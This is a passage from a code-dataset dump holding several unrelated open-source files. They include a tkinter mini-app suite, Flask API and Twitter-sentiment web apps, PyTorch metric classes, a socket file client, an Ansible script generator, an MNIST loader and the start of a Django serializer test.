bold\",fg=\"black\",bg='CadetBlue1').place(x=160,y=230)\r\n b7 = Button(nw2,text=\"Home\", font=\"arial 12\",command=homebtn2)\r\n b7.place(x=180,y=340)\r\n btn.set('google')\r\n nw2.config(bg='CadetBlue1')\r\n nw2.mainloop()\r\n \r\ndef analyser():\r\n rootp.withdraw()\r\n nw3=Tk()\r\n nw3.title(\"Sentiment Analyser\")\r\n nw3.resizable(False,False)\r\n\r\n def detectSentiment(): # get a whole input content from text box\r\n sentence=entry.get()\r\n t1.delete(0.0,END)\r\n # Create a Sentiment IntensityAnalyzer object.\r\n sid_obj=SentimentIntensityAnalyzer()\r\n #polarity_scores method of SentimentintensityAnalyzer\r\n #object gives a sentiment dictionary. #which contains pos, neg, neu, and compound scores.\r\n sentiment_dict = sid_obj.polarity_scores(sentence)\r\n \r\n negative_string=str(sentiment_dict['neg']*100) + \"% Negative\"\r\n t1.insert(END, negative_string+'\\n')\r\n \r\n neutral_string=str(sentiment_dict['neu']*100) + \"% Neutral\"\r\n t1.insert(END, neutral_string+'\\n')\r\n \r\n positive_string=str(sentiment_dict['pos']*100) + \"% Positive\"\r\n t1.insert(END, positive_string+'\\n')\r\n # decide sentiment as positive, negative and neutral\r\n if sentiment_dict['compound'] >= 0.05 :\r\n string=\"Positive\"\r\n elif sentiment_dict['compound']<= -0.05 :\r\n string=\"Negative\"\r\n else:\r\n string=\"Neutral\"\r\n t1.insert(END,f\"Overall Result: {string}\")\r\n\r\n def home22():\r\n nw3.withdraw()\r\n rootp.deiconify()\r\n\r\n nw3.configure(bg='#00003c')\r\n nw3.geometry(\"300x325\")\r\n entry=Entry(nw3, width=20, font=('arial',14))\r\n entry.place(x=5,y=20)\r\n \r\n btn2= Button(nw3, text='Analyze', bg=\"#201d2e\", width= 6,fg='white', font=(\"Arial\", 10 ), command=detectSentiment)\r\n btn2.place(x=232,y=20)\r\n frame2 = Frame(nw3, bd=2, relief=RIDGE, bg='#201d2e')\r\n frame2.place(x=10, y=70,height=250,width=280)\r\n Label(frame2, text=\"Result\",bg=\"#201d2e\",fg='white',font=('arial', 12, 'bold')).place(x=10,y=5)\r\n t1= Text(frame2, bd=2, relief= SUNKEN, font=(\"Calibri\",12, 'bold'))\r\n t1.place(x=10,y=30,width=255,height=150)\r\n\r\n title_label= Label(frame2, text='Sentimental Analyser',font= ('artal', 12, 'bold'),fg='#ffffff',bg='#201d2e')\r\n title_label.place(x=60,y=185)\r\n\r\n b22=Button(frame2, text='HOME',font= ('artal', 10, 'bold'),fg='#ffffff',bg='#201d2e',command=home22)\r\n b22.place(x=110,y=210)\r\n \r\n nw3.mainloop()\r\n \r\ndef game():\r\n rootp.withdraw()\r\n nw4=Tk()\r\n nw4.title(\"Game\")\r\n nw4.geometry(\"550x300\")\r\n nw4.resizable(False,False)\r\n computer_value={\"0\":\"Rock\",\"1\":\"Paper\",\"2\":\"Scissor\"}\r\n def reset_game():\r\n b7[\"state\"]=\"active\"\r\n b8[\"state\"]=\"active\"\r\n b9[\"state\"]=\"active\"\r\n l1.config(text=\"Player \")\r\n l3.config(text=\"Computer\")\r\n l4.config(text=\"\")\r\n\r\n def button_disable():\r\n b7[\"state\"]=\"disable\"\r\n b8[\"state\"]=\"disable\"\r\n b9[\"state\"]=\"disable\"\r\n\r\n def isrock():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Rock\":\r\n match_result=\"Match Draw\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Player Win\"\r\n else:\r\n match_result=\"Computer Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Rock \")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def ispaper():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Paper\":\r\n match_result=\"Match Draw\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Computer Win\"\r\n else:\r\n match_result=\"Player Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Paper 
\")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def isscissor():\r\n c_v=computer_value[str(random.randint(0,2))]\r\n if c_v==\"Rock\":\r\n match_result=\"Computer Win\"\r\n elif c_v==\"Scissor\":\r\n match_result=\"Match Draw\"\r\n else:\r\n match_result=\"Player Win\"\r\n l4.config(text=match_result)\r\n l1.config(text=\"Scissor \")\r\n l3.config(text=c_v)\r\n button_disable()\r\n\r\n def homebt():\r\n nw4.withdraw()\r\n rootp.deiconify()\r\n\r\n Label(nw4,text=\"Rock Paper Scissor\",font=\"normal 20 bold\",fg=\"blue\").pack(pady=20)\r\n frame=Frame(nw4)\r\n frame.pack()\r\n\r\n l1=Label(frame,text=\"Player \",font=10,bg='DeepSkyBlue')\r\n l2=Label(frame,text=\"VS \",font=\"normal 10 bold\",bg='DeepSkyBlue')\r\n l3=Label(frame,text=\"Computer \",font=10,bg='DeepSkyBlue')\r\n l1.pack(side=LEFT)\r\n l2.pack(side=LEFT)\r\n l3.pack()\r\n\r\n l4=Label(nw4,text=\"\",font=\"normal 20 bold\",bg=\"white\",width=15,borderwidth=2,relief=\"solid\")\r\n l4.pack(pady=20)\r\n frame1=Frame(nw4)\r\n frame1.pack()\r\n\r\n b7=Button(nw4,text=\"Rock\",font=10,width=7,command=isrock)\r\n b8=Button(nw4,text=\"Paper\",font=10,width=7,command=ispaper)\r\n b9=Button(nw4,text=\"Scissor\",font=10,width=7,command=isscissor)\r\n b7.place(x=120,y=190)\r\n b8.place(x=225,y=190)\r\n b9.place(x=330,y=190)\r\n\r\n Button(nw4,text=\"Reset Game\",font=10,fg=\"white\",bg=\"black\",command=reset_game).place(x=145,y=240)\r\n Button(nw4,text=\"Home\",font=8,fg=\"white\",bg=\"black\",command=homebt).place(x=315,y=240)\r\n nw4.config(bg='DeepSkyBlue')\r\n nw4.mainloop()\r\n \r\ndef exit():\r\n rootp.withdraw()\r\n\r\nb1=Button(rootp,text=\"Music Player\",fg=\"blue\",font='times 13 bold',command=music_player)\r\nb1.place(x=50,y=110)\r\nb1.config(height=5,width=23)\r\nb2=Button(rootp,text=\"Search on Web Browser\",fg=\"blue\",font='times 13 bold',command=browser)\r\nb2.place(x=310,y=110)\r\nb2.config(height=5,width=23)\r\nb3=Button(rootp,text=\"Get your Text Analysed\",fg=\"blue\",font='times 13 bold',command=analyser)\r\nb3.place(x=50,y=230)\r\nb3.config(height=5,width=23)\r\nb4=Button(rootp,text=\"Bored? 
Play a Game!\",fg=\"blue\",font='times 13 bold',command=game)\r\nb4.place(x=310,y=230)\r\nb4.config(height=5,width=23)\r\nb5=Button(rootp,text=\"EXIT\",fg=\"red\",font='times 10 bold',command=exit)\r\nb5.place(x=260,y=370)\r\nb5.config(height=2,width=10)\r\nrootp.config(bg='light sea green')\r\nLabel(rootp,text='WELCOME',relief='ridge',font='times 28 bold italic',fg='blue').pack()\r\nrootp.mainloop()\r\n","repo_name":"nona02/BOREDUM_BUSTER","sub_path":"MAIN_FILE.py","file_name":"MAIN_FILE.py","file_ext":"py","file_size_in_byte":13584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15048607921","text":"#!/usr/bin/python3\n\"\"\"GET, POST, PUT, DELETE on cities\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom datetime import datetime\nfrom flask import jsonify, abort, request\n\n\n@app_views.route('/states/<state_id>/cities', methods=['GET'],\n strict_slashes=False)\ndef get_all_cities_of_state(state_id):\n \"\"\"Retrieves the list of all City objects of a State\"\"\"\n if not storage.get(\"State\", state_id):\n abort(404)\n cities = storage.all(\"City\")\n list_cities = [city.to_dict()\n for city in cities.values()\n if city.state_id == state_id]\n return jsonify(list_cities)\n\n\n@app_views.route('/cities/<city_id>', methods=['GET'], strict_slashes=False)\ndef get_a_city(city_id):\n \"\"\"Retrieves a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n return jsonify(city.to_dict())\n\n\n@app_views.route('/cities/<city_id>', methods=['DELETE'],\n strict_slashes=False)\ndef delete_a_city(city_id):\n \"\"\"Delete a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n city.delete()\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/states/<state_id>/cities', methods=['POST'],\n strict_slashes=False)\ndef add_a_city(state_id):\n \"\"\"Add a city related a state to storage\"\"\"\n from models.city import City\n if not storage.get(\"State\", state_id):\n abort(404)\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n if 'name' not in request.get_json():\n abort(400, description=\"Missing name\")\n\n data = request.get_json()\n data['state_id'] = state_id\n obj = City(**data)\n storage.new(obj)\n storage.save()\n return jsonify(obj.to_dict()), 201\n\n\n@app_views.route('/cities/<city_id>', methods=['PUT'], strict_slashes=False)\ndef update_a_city(city_id):\n \"\"\"Update a specific City\"\"\"\n city = storage.get(\"City\", city_id)\n if not city:\n abort(404)\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n\n data = request.get_json()\n static = ['id', 'state_id', 'created_at', 'updated_at']\n data_to_use = {k: v for k, v in data.items() if k not in static}\n k = \"City\" + \".\" + city_id\n if data_to_use:\n for d in data_to_use:\n setattr(storage.all()[k], d, data_to_use.get(d))\n setattr(storage.all()[k], 'updated_at', datetime.utcnow())\n storage.save()\n updated_city = storage.get(\"City\", city_id)\n return jsonify(updated_city.to_dict()), 200\n","repo_name":"Gratien1/AirBnB_clone_v3","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38776672993","text":"\"\"\"Evaluation metrics.\"\"\"\n\nfrom collections import defaultdict\nimport math\nfrom typing import List\n\nimport torch\n\n\nclass Metric:\n score_key = 
None\n keys = None\n\n def __init__(self, label_map):\n self.label_map = label_map\n self.reset()\n\n def reset(self):\n raise NotImplementedError\n\n def update(self, labels, predictions):\n raise NotImplementedError\n\n def reduce(self):\n raise NotImplementedError\n\n def get(self):\n raise NotImplementedError\n\n\nclass Accuracy(Metric):\n score_key = 'accuracy'\n keys = ['accuracy']\n\n def reset(self):\n self.correct = 0\n self.total = 0\n\n def update(self, labels, predictions):\n self.correct += labels.eq(predictions).sum()\n self.total += labels.size(0)\n\n def reduce(self):\n torch.distributed.reduce(self.correct, 0)\n torch.distributed.reduce(self.total, 0)\n\n def get(self):\n return {'accuracy': self.correct.item() / (self.total + 1e-13)}\n\n\nclass BinaryF1(Metric):\n score_key = 'f1'\n keys = ['precision', 'recall', 'f1']\n\n def reset(self):\n self.tp = 0\n self.fp = 0\n self.fn = 0\n\n def update(self, labels, predictions):\n self.tp += torch.sum(labels.eq(1) & predictions.eq(1))\n self.fp += torch.sum(labels.eq(0) & predictions.eq(1))\n self.fn += torch.sum(labels.eq(1) & predictions.eq(0))\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n def get(self):\n precision = self.tp / (self.tp + self.fp + 1e-13)\n recall = self.tp / (self.tp + self.fn + 1e-13)\n f1 = 2 * precision * recall / (precision + recall + 1e-13)\n return {\n 'precision': precision.item(),\n 'recall': recall.item(),\n 'f1': f1.item(),\n }\n\n\nclass AccuracyF1(Metric):\n score_key = 'f1'\n keys = [*Accuracy.keys, *BinaryF1.keys]\n\n def __init__(self, label_map):\n self.label_map = label_map # TODO(rloganiv): IDK\n self.accuracy = Accuracy(label_map)\n self.f1 = BinaryF1(label_map)\n\n def reset(self):\n self.accuracy.reset()\n self.f1.reset()\n\n def update(self, labels, predictions):\n self.accuracy.update(labels, predictions)\n self.f1.update(labels, predictions)\n\n def reduce(self):\n self.accuracy.reduce()\n self.f1.reduce()\n\n def get(self):\n return {**self.accuracy.get(), **self.f1.get()}\n\n\nclass MacroF1(Metric):\n score_key = 'f1'\n keys = ['precision', 'recall', 'f1']\n\n def reset(self):\n self.tp = torch.zeros(len(self.label_map))\n self.fp = torch.zeros(len(self.label_map))\n self.fn = torch.zeros(len(self.label_map))\n\n def update(self, labels, predictions):\n # TODO(rloganiv): This is kind of hacky, but idk if there's a better\n # way.\n self.tp = self.tp.to(labels.device)\n self.fp = self.fp.to(labels.device)\n self.fn = self.fn.to(labels.device)\n\n for i in range(len(self.label_map)):\n self.tp[i] += torch.sum(labels.eq(i) & predictions.eq(i))\n self.fp[i] += torch.sum(labels.ne(i) & predictions.eq(i))\n self.fn[i] += torch.sum(labels.eq(i) & predictions.ne(i))\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n def get(self):\n precision = self.tp / (self.tp + self.fp + 1e-13)\n recall = self.tp / (self.tp + self.fn + 1e-13)\n f1 = 2 * precision * recall / (precision + recall + 1e-13)\n return {\n 'precision': precision.mean().item(),\n 'recall': recall.mean().item(),\n 'f1': f1.mean().item(),\n }\n\n\nclass AccuracyMacroF1(Metric):\n score_key = 'f1'\n keys = [*Accuracy.keys, *MacroF1.keys]\n\n def __init__(self, label_map):\n self.label_map = label_map # TODO(rloganiv): IDK\n self.accuracy = Accuracy(label_map)\n self.f1 = MacroF1(label_map)\n\n def reset(self):\n self.accuracy.reset()\n 
self.f1.reset()\n\n def update(self, labels, predictions):\n self.accuracy.update(labels, predictions)\n self.f1.update(labels, predictions)\n\n def reduce(self):\n self.accuracy.reduce()\n self.f1.reduce()\n\n def get(self):\n return {**self.accuracy.get(), **self.f1.get()}\n\n\nclass MatthewsCorrelation(Metric):\n score_key = 'matthews_correlation'\n keys = ['matthews_correlation']\n\n def reset(self):\n self.tp = 0\n self.tn = 0\n self.fp = 0\n self.fn = 0\n\n def update(self, labels, predictions):\n self.tp += torch.sum(labels.eq(1) & predictions.eq(1)).item()\n self.tn += torch.sum(labels.eq(0) * predictions.eq(0)).item()\n self.fp += torch.sum(labels.eq(0) & predictions.eq(1)).item()\n self.fn += torch.sum(labels.eq(1) & predictions.eq(0)).item()\n\n def reduce(self):\n torch.distributed.reduce(self.tp, 0)\n torch.distributed.reduce(self.tn, 0)\n torch.distributed.reduce(self.fp, 0)\n torch.distributed.reduce(self.fn, 0)\n\n\n def get(self):\n numerator = self.tp * self.tn - self.fp * self.fn\n denominator = math.sqrt(\n (self.tp + self.fp) *\n (self.tp + self.fn) * \n (self.tn + self.fp) *\n (self.tn + self.fn)\n )\n return {'matthews_correlation': numerator / (denominator + 1e-13)}\n\n\nMETRICS = {\n 'accuracy': Accuracy,\n 'accuracy-f1': AccuracyF1,\n 'binary-f1': BinaryF1,\n 'macro-f1': MacroF1,\n 'accuracy-macro-f1': AccuracyMacroF1,\n 'matthews-correlation': MatthewsCorrelation,\n}\n","repo_name":"ucinlp/null-prompts","sub_path":"nullprompt/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5763,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"} +{"seq_id":"35036018173","text":"import csv\nimport copy\nf = open('D:\\REST API file\\\\result\\\\file_category.csv','r',newline='')\nreader = csv.reader(f)\nf1 = open('D:\\REST API file\\\\result\\contextedRelation-all4455006185630056196.csv','r',newline='')\nreader1 = csv.reader(f1)\nf7 = open('D:/REST API file/result/contextedRelation-cate.csv', 'w', newline='')\nwriter7 = csv.writer(f7)\n# 文件名:类别\ndict={}\nfor row in reader:\n list=[]\n list.append(row[2])\n dict[row[0]]=list\nprint(dict)\n\n#version\n# for row in reader1:\n# if row[0] in dict:\n# list=dict[row[0]]\n# if row[4]!=\"1\" or row[1]==\"TRUE\" or row[2]==\"TRUE\" or row[3]==\"TRUE\":\n# list.append(1)\n# list.extend(row[1:5])\n#\n# else:\n# list.append(0)\n# writer7.writerow([row[0]]+list)\n\n# acceptToken\nfor row in reader1:\n # print(row)\n list1 = []\n if row[0] in dict:\n # 深拷贝,直接赋值是浅拷贝,是一种引用,会改变被引用的值https://blog.csdn.net/u010712012/article/details/79754132\n list1 = copy.deepcopy(dict[row[0]])\n list1.extend(row[1:])\n print([row[0]] + list1)\n writer7.writerow([row[0]] + list1)","repo_name":"Nana1209/DataAnalysis","sub_path":"fileHandle/allToCategory.py","file_name":"allToCategory.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37350806025","text":"import os\nimport csv\nfrom flask import Flask, request, render_template, redirect, url_for, send_file\nfrom crontab import CronTab\nfrom model.sentiment import *\nfrom stream import *\nfrom config import *\n\n# set Flask\napp = Flask(__name__)\n\n# set CNN model\nglobal graph\ngraph = tf.get_default_graph()\nvocab, tokenizer, max_length, model = load_variabels()\n# text = 'terima kasih pak!'\n# percent, conclusi = predict_sentiment(text, vocab, tokenizer,max_length, model)\n# print(percent, conclusi)\n\n# Set crontab\ncron = 
CronTab(user=curr_username)\ncron.remove_all()\ncron.write()\n\n#-------------------- ROUTE ---------------------------------------------------\n# index route\n@app.route(\"/\")\ndef index():\n raw_file = os.listdir(raw_file_directory)\n if(len(cron) > 0):\n is_stream_run = True\n else:\n is_stream_run = False\n return render_template('index.html', raw_file=raw_file, is_stream_run=is_stream_run)\n\n# predict route\n@app.route(\"/predict\")\ndef predict():\n predict_file = os.listdir(predict_file_directory)\n return render_template('predict.html', predict_file=predict_file)\n\n# twitter start stream route\n@app.route(\"/start_stream\", methods=[\"GET\", \"POST\"])\ndef start_stream():\n params = request.form\n if(params == None):\n params = flask.request.args\n if(params != None):\n if(params.get(\"menit\") != \"\"):\n # activate stream \n duration = int(params.get(\"menit\"))\n saveDirectory = dir_aplikasi + \"/\" +raw_file_directory\n begin_stream(duration, saveDirectory)\n\n # activate crontab \n cron.remove_all()\n cron.write()\n duration = str(duration)\n job = cron.new(command= dir_python + ' ' + dir_aplikasi + '/streamArg.py ' + duration + ' ' + dir_aplikasi + \"/\" +raw_file_directory)\n duration = int(duration)\n job.minute.every(duration)\n cron.write()\n \n return redirect(url_for('index'))\n\n# twitter stop stream route\n@app.route(\"/stop_stream\")\ndef stop_stream():\n cron.remove_all()\n cron.write()\n return redirect(url_for('index'))\n\n# Download file route\n@app.route(\"/download/<directory>/<filename>\")\ndef download(directory, filename):\n if(directory == \"raw\"):\n return(send_file(dir_aplikasi + \"/\" + raw_file_directory + \"/\" +filename))\n else:\n return(send_file(dir_aplikasi + \"/\" + predict_file_directory + \"/\" +filename))\n\n# Predict route using CNN Model\n@app.route(\"/predict_txt/<filename>\")\ndef predict_txt(filename):\n input_file = open(raw_file_directory + \"/\" + filename)\n csv_head = ['text', 'conclusi', 'percent']\n csv_body = []\n for line in input_file:\n with graph.as_default():\n percent, conclusion = predict_sentiment(line, vocab, tokenizer, max_length, model)\n csv_line = {}\n csv_line[\"text\"] = line\n csv_line[\"conclusi\"] = conclusion\n csv_line[\"percent\"] = str(percent * 100)\n csv_body.append(csv_line)\n \n input_file.close()\n # os.remove(raw_file_directory + \"/\" + filename)\n\n csv_name = filename + \".csv\"\n try:\n with open(predict_file_directory + \"/\" + csv_name, 'w') as csv_name:\n writer = csv.DictWriter(csv_name, fieldnames=csv_head)\n writer.writeheader()\n for data in csv_body:\n writer.writerow(data)\n except IOError:\n print(\"I/O error\")\n return redirect(url_for('predict'))\n","repo_name":"BimaAdi/twitter-stream-and-cnn-model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15363717114","text":"#! 
/usr/bin/env python3\n\n# Echo client program\nimport socket, sys, re, time\nsys.path.append(\"../lib\") # for params\nimport params\n\ndef fileDecoder():\n\n\n restore = open(\"rF.archServ\", 'rb')\n\n\n print(\"Decoding recieved file...\")\n metadata = []\n\n for i in range(4):\n metadata.append(restore.readline())\n\n fname1 = str(metadata[0])\n fname2 = str(metadata[2])\n\n fname1 = fname1[1:len(fname1) - 3]\n fname2 = fname2[1:len(fname2) - 3]\n\n undo = open(fname1, 'wb')\n rest = open(fname2, 'wb')\n\n undo.write(restore.read(int(metadata[1])))\n\n rest.write(restore.read())\n print(\"Done.\\n\")\n return\n\nswitchesVarDefaults = (\n (('-s', '--server'), 'server', \"127.0.0.1:50001\"),\n (('-d', '--delay'), 'delay', \"0\"),\n (('-?', '--usage'), \"usage\", False), # boolean (set if present)\n )\n\n\nprogname = \"framedClient\"\nparamMap = params.parseParams(switchesVarDefaults)\n\nserver, usage = paramMap[\"server\"], paramMap[\"usage\"]\n\nif usage:\n params.usage()\n\ntry:\n serverHost, serverPort = re.split(\":\", server)\n serverPort = int(serverPort)\nexcept:\n print(\"Can't parse server:port from '%s'\" % server)\n sys.exit(1)\n\ns = None\nfor res in socket.getaddrinfo(serverHost, serverPort, socket.AF_UNSPEC, socket.SOCK_STREAM):\n af, socktype, proto, canonname, sa = res\n try:\n print(\"creating sock: af=%d, type=%d, proto=%d\" % (af, socktype, proto))\n s = socket.socket(af, socktype, proto)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s = None\n continue\n try:\n print(\" attempting to connect to %s\" % repr(sa))\n s.connect(sa)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s.close()\n s = None\n continue\n break\n\nif s is None:\n print('could not open socket')\n sys.exit(1)\n\ndelay = float(paramMap['delay']) # delay before reading (default = 0s)\nif delay != 0:\n print(f\"sleeping for {delay}s\")\n time.sleep(int(delay))\n print(\"done sleeping\")\n\nchunks = []\nprint(\"Connected. Recieving data...\")\nwhile 1:\n chunk = s.recv(1024)\n\n if len(chunk) == 0:\n break\n\n\n chunks.append(chunk)\n\n\nprint(\"Zero length read. 
Closing socket...\")\ns.close()\n\nrecievFile = open(\"rF.archServ\", 'wb+')\nrejoint = bytes()\n\nfor i in range( len(chunks)):\n rejoint = rejoint + chunks[i]\n\nrecievFile.write(rejoint)\n\nrecievFile.close()\n\nfileDecoder()\n","repo_name":"utep-cs-systems-courses/os-project3-framing-AleLeeHrtz","sub_path":"servers/reciever.py","file_name":"reciever.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17731853327","text":"''' '''\n\nimport argparse\nimport os\n\nINTRO = '''#!/bin/bash\n\nset -x\n\n'''\n\nPIDS_NEW = '''PIDS=\"\"\n'''\nPIDS_WAIT = '''\nfor PID in $PIDS; do\n wait $PID\ndone\n\n'''\n\nZOOKEEPER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_zookeeper{org}.yml &> log_autogenstart_zookeeper{org} &\nPIDS=\"$PIDS $!\" \n'''\n\nKAFKA = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_kafka{org}.yml &> log_autogen_start_kafka{org} &\nPIDS=\"$PIDS $!\"\n'''\n\nFABRICCA = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_fabricca{org}.yml &> log_autogen_start_fabricca{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\nORDERER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_orderer{org}.yml &> log_autogen_start_orderer{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\nPEER = '''ansible-playbook --key-file \"~/.ssh/fabric\" autogen_start_peer{peer}org{org}.yml &> log_autogen_start_peer{peer}org{org}.log &\nPIDS=\"$PIDS $!\" \n'''\n\ndef start(fp, body, org_count):\n fp.write(PIDS_NEW)\n for org in range(0, org_count):\n fp.write(body.format(org=org))\n fp.write(PIDS_WAIT)\n\n\ndef script_start(peer_count):\n org_count = len(peer_count)\n\n filename = 'autogen_start.sh'\n with open(filename, 'w') as fp:\n fp.write(INTRO)\n start(fp, ZOOKEEPER, org_count)\n start(fp, KAFKA, org_count)\n start(fp, FABRICCA, org_count)\n start(fp, ORDERER, org_count)\n\n fp.write(PIDS_NEW)\n for org in range(0, org_count):\n for peer in range(0, peer_count[org]):\n fp.write(PEER.format(peer=peer, org=org))\n fp.write(PIDS_WAIT)\n os.chmod(filename, 0o755)\n\n\ndef script_template(host, service, vars_file, filename):\n\n template = '''---\n- hosts: {host}\n remote_user: root\n gather_facts: yes\n vars_files:\n - \"{vars_file}\"\n vars:\n service_name: \"{service}\"\n roles:\n - start\n '''\n\n with open(filename, 'w') as ffile:\n ffile.write(template.format(host=host, service=service, vars_file=vars_file))\n\n\ndef script_yml(peer_count, vars_file):\n\n org_count = len(peer_count)\n for org in range(0, org_count):\n script_template('z{}'.format(org), 'zookeeper.service', vars_file, 'autogen_start_zookeeper{}.yml'.format(org))\n script_template('k{}'.format(org), 'kafka.service', vars_file, 'autogen_start_kafka{}.yml'.format(org))\n script_template('fabricca{}'.format(org), 'fabricca.service', vars_file, 'autogen_start_fabricca{}.yml'.format(org))\n script_template('orderer{}'.format(org), 'orderer.service', vars_file, 'autogen_start_orderer{}.yml'.format(org))\n\n script_template('orderer{}'.format(org), 'orderer.service', vars_file, 'autogen_start_orderer{}.yml'.format(org))\n for peer in range(0, peer_count[org]):\n script_template('peer{}org{}'.format(peer, org), 'peer.service', vars_file, 'autogen_start_peer{}org{}.yml'.format(peer, org))\n\n\ndef main():\n '''parse cmdline args and print script'''\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--peer_count',\n nargs='+',\n type=int,\n help='number of peers per org')\n 
parser.add_argument('-v', '--vars_file', help='ansible vars_file location')\n args = parser.parse_args()\n\n script_yml(args.peer_count, args.vars_file)\n script_start(args.peer_count)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyperledger-labs/fabric-vms-provision","sub_path":"ansible/utils/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"42902395835","text":"class Penguin:\n def __init__(self, lenArms = 2, lenLegs = 2, numEyes = 2, tail = True, furry = True) -> None:\n self.lenArms = lenArms\n self.lenLegs = lenLegs\n self.numEyes = numEyes\n self.tail = tail\n self.furry = furry\n\n def describe(self):\n print(\"Length of arms:\", self.lenArms)\n print(\"\\nLen of legs:\", self.lenLegs)\n print(\"\\nNumber of eyes:\", self.numEyes)\n print(\"\\nHas a tail:\", self.tail)\n print(\"\\nHas fur:\", self.furry)\n\np = Penguin()\np.describe()\n ","repo_name":"manjushettar/astr-19","sub_path":"asgn1-question4.py","file_name":"asgn1-question4.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10055416467","text":"from tensorflow import keras\nimport tensorflow as tf\nimport numpy as np\n\n\nclass MnistData:\n def __init__(self, config):\n self.config = config\n (x_train_, self.y_train), (x_test_, self.y_test) = keras.datasets.mnist.load_data()\n x_train_ = x_train_ / 255.\n x_test_ = x_test_ / 255.\n self.x_train = x_train_.reshape((-1, 28, 28, 1))\n self.x_test = x_test_.reshape((-1, 28, 28, 1))\n\n self.next_batch(self.config.batch_size)\n\n def next_batch(self, batch_size):\n # train_data\n train_data = tf.data.Dataset.from_tensor_slices((tf.convert_to_tensor(self.x_train, dtype=tf.float32),\n tf.convert_to_tensor(self.y_train, dtype=tf.int64)))\n train_data = train_data.shuffle(60000)\n train_data = train_data.batch(batch_size)\n\n # test_data\n test_data = tf.data.Dataset.from_tensor_slices((tf.convert_to_tensor(self.x_test, dtype=tf.float32),\n tf.convert_to_tensor(self.y_test, dtype=tf.int64)))\n test_data = test_data.batch(batch_size)\n\n # iterator\n iterator = tf.data.Iterator.from_structure(train_data.output_types, train_data.output_shapes)\n\n self.next_data = iterator.get_next()\n\n # init_op\n self.train_init_op = iterator.make_initializer(train_data)\n self.test_init_op = iterator.make_initializer(test_data)\n\n\n\nif __name__ == '__main__':\n mnist = MnistData('')\n print(mnist.x_train.shape)\n train_init_op, test_init_op = mnist.next_batch(1)\n\n with tf.Session() as sess:\n sess.run(train_init_op)\n train_data, train_label = mnist.next_data\n print(sess.run(train_data).shape)\n print(sess.run(train_label))\n\n","repo_name":"enningxie/Template_for_TensorFlow","sub_path":"data_loader/mnist_data_generator.py","file_name":"mnist_data_generator.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27984634906","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.test import TestCase\nfrom alerts.events import factories\nfrom events import serializers\n\n\nclass TestSerializers(TestCase):\n\n def test_user_serializer(self):\n dapp = factories.DAppFactory()\n serialized_user = serializers.UserSerializer(dapp.user)\n serialized_dapp = serializers.DAppSerializer(dapp)\n 
self.assertIsNotNone(serialized_user)\n self.assertEquals(serialized_user.data.get('email'), dapp.user.email)\n self.assertEquals(serialized_dapp.data.get('authentication_code'), dapp.authentication_code)\n\n user_dict = {'email': None}\n dapp_dict = {'name': None, 'authentication_code': dapp.authentication_code, 'user': user_dict}\n\n serialized_dapp_fail = serializers.DAppSerializer(data=dapp_dict)\n serialized_user_fail = serializers.UserSerializer(data=user_dict)\n self.assertFalse(serialized_dapp_fail.is_valid())\n self.assertFalse(serialized_user_fail.is_valid())\n\n dapp_dict['name'] = 'testname'\n dapp_dict['authentication_code'] = 'testcode'\n user_dict['email'] = 'anotheremail@test.com'\n dapp_dict['user'] = user_dict\n\n serialized_dapp_success = serializers.DAppSerializer(data=dapp_dict)\n serialized_user_success = serializers.UserSerializer(data=user_dict)\n\n self.assertTrue(serialized_dapp_success.is_valid())\n self.assertTrue(serialized_user_success.is_valid())\n\n def test_event_serializer(self):\n event_value = 